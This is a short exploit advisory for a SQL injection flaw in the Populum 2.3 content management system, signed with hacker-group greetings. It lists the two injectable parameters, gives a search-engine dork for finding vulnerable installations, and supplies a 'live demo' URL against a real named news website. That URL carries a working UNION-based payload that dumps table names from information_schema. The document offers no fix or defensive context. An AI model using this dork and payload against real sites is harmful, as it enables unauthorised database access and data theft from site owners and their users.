Populum version 2.3 suffers from a remote SQL injection vulnerability.
c951f53ecf3b068d13e19036ad579f67028a58dab197523e95aa602382181c8a
::::::::::::::ProUd to Be InDiaN::::::::::::::
~AuthoR : -[SiLeNtp0is0n]-
~Vuln. App : Populum version 2.3
~App Detail : Content management software for hybrid blog/media/commerce communities
~VuLneraBiLity : SQL injection
~DoRk : "Powered by Populum"
~My HoMe : www.andhrahackers.com
~gReetZ : Mr.XXXX ShRushe tRif0Rce h3LLb0y bRonRiC
~SpL gReetZ : TeamICW
:::::::::::::::::::::::::::::::::::::::::::::::
Vulnerable :
127.0.0.1/populum/diarypage.php?did=[SQL injection]
127.0.0.1/populum/link.php?id=[SQL injection]
:::::::::::::::::::::::::::::::::::::::::::::::
Live Demo :
http://www.opednews.com/populum/diarypage.php?did=15458+and+1=2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=database()--
:::::::::::::::::::::::::::::::::::::::::::::::